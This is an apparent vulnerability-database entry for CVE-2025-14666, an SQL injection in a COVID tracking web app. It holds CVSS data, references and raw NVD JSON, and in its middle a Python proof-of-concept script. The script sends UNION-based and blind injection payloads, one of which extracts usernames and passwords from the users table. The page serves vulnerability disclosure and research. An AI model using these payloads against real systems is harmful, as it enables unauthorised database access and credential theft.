CVE-2025-14666

Description

A weakness has been identified in itsourcecode COVID Tracking System 1.0. The affected element is an unknown function of the file /admin/?page=user. This manipulation of the argument Username causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:covid_tracking_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode COVID Tracking System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14666 SQL Injection PoC
# Target: itsourcecode COVID Tracking System 1.0
# Endpoint: /admin/?page=user
# Parameter: Username

import requests
import sys

target_url = "http://target-site.com/admin/?page=user"

# Basic SQL Injection test - single quote to trigger error
def test_basic_injection():
    print("[*] Testing basic SQL injection...")
    payload = "'"
    data = {"Username": payload}
    response = requests.post(target_url, data=data)
    if "sql" in response.text.lower() or "error" in response.text.lower():
        print("[+] SQL injection confirmed - error detected")
        return True
    return False

# UNION-based injection to extract database info
def union_injection():
    print("[*] Performing UNION-based injection...")
    # Extract current database name
    payload = "' UNION SELECT NULL,database(),NULL,NULL,NULL-- -"
    data = {"Username": payload}
    response = requests.post(target_url, data=data)
    if response.status_code == 200:
        print("[+] Database name extracted")
    return response.text

# Extract users table data
def extract_users():
    print("[*] Extracting user credentials...")
    payload = "' UNION SELECT NULL,username,password,NULL,NULL FROM users-- -"
    data = {"Username": payload}
    response = requests.post(target_url, data=data)
    return response.text

# Boolean-based blind injection for data extraction
def blind_injection():
    print("[*] Performing blind SQL injection...")
    # Test if admin user exists
    payload = "' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0-- -"
    data = {"Username": payload}
    response = requests.post(target_url, data=data)
    if "success" in response.text.lower():
        print("[+] Admin user exists in database")
    return response.text

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    print(f"[*] Target: {target_url}")
    test_basic_injection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14666
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14666
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14666/
[4] VulDB https://vuldb.com/cve/CVE-2025-14666
[5] https://github.com/bardminx/Lonlydance/issues/2
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.336398
[8] https://vuldb.com/?id.336398
[9] https://vuldb.com/?submit.714786

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14666", "sourceIdentifier": "[email protected]", "published": "2025-12-14T16:15:37.047", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in itsourcecode COVID Tracking System 1.0. The affected element is an unknown function of the file /admin/?page=user. This manipulation of the argument Username causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:covid_tracking_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F9CA2A72-A364-4090-A959-6AA82D55A239"}]}]}], "references": [{"url": "https://github.com/bardminx/Lonlydance/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.336398", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336398", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.714786", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}